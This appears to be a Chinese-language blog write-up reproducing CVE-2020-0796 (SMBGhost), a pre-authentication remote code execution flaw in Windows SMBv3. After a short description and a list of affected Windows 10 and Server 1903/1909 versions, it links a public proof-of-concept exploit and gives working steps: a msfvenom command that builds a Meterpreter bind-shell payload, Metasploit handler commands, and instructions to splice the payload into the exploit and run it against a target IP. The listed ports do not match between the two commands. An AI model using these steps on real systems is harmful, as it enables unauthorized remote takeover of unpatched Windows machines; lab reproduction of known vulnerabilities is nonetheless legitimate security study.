0x1 漏洞简介:
Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品,Microsoft Windows是一套个人设备使用的操作系统,Microsoft Windows Server是一套服务器操作系统,Server Message Block是其中的一个服务器信息传输协议。
微软公布了在Server Message Block 3.0(SMBv3)中发现的"蠕虫型"预授权远程代码执行漏洞。
0x2 漏洞概述:
(CVE-2020-0796 SMBGhost)该漏洞是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的,它可让远程且未经身份验证的攻击者在目标系统上执行任意代码。
0x3 影响版本:
适用于32位系统的Windows 10版本1903
Windows 10 1903版(用于基于x64的系统)
Windows 10 1903版(用于基于ARM64的系统)
Windows Server 1903版(服务器核心安装)
适用于32位系统的Windows 10版本1909
Windows 10版本1909(用于基于x64的系统)
Windows 10 1909版(用于基于ARM64的系统)
Windows Server版本1909(服务器核心安装)
0x4 配套工具
Poc:https://github.com/chompie1337/SMBGhost_RCE_PoC
Win10 文件下载地址:
ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/
0x5 漏洞复现:
msfvenom -p /windows/x64/meterpreter/bind_tcp lport=1314 -f py -o test.py
use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set lport 4444 set rhost 192.168.1.144 run
替换掉exploit里的user_payload:
执行EXP(explpoit.py -ip xxx.xxx.xxx.xxx),msf开启监听
发表评论